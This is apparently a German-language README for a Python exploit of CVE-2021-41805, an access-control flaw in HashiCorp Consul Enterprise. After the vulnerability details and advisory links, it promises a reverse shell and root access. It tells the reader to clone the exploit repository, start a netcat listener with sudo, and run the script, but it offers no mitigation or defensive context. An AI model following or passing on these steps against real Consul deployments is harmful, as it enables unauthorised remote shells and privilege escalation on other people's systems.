
HashiCorp Consul Exploit mit Python. (CVE-2021-41805)
HashiCorp Consul Enterprise vor 1.8.17, 1.9.x vor 1.9.11 und 1.10.x vor 1.10.4 hat eine falsche Zugriffskontrolle. Ein ACL-Token (mit den Standardberechtigungen operator:write) in einem Namespace kann für eine unbeabsichtigte Privilegienerweiterung in einem anderen Namespace verwendet werden.
CVE_ID : CVE-2021-41805
Basis-Score : 8.8
Schweregrad : Hoch
Veröffentlicht am : 2021-12-12
Betroffene Versionen: HashiCorp Consul Enterprise vor 1.8.17, 1.9.x vor 1.9.11 und 1.10.x vor 1.10.4
https://www.cvedetails.com/cve/CVE-2021-41805/
https://security.netapp.com/advisory/ntap-20211229-0007/
Erhalten Sie eine Reverse-Shell und Root-Zugriff.
git clone https://github.com/I-Am-Nelson/CVE-2021-41805.git
cd CVE-2021-41805
Dann starten Sie den Listener:
sudo nc -lvnp <port>
Dann führen Sie den Exploit aus:
python3 CVE-2021-41805.py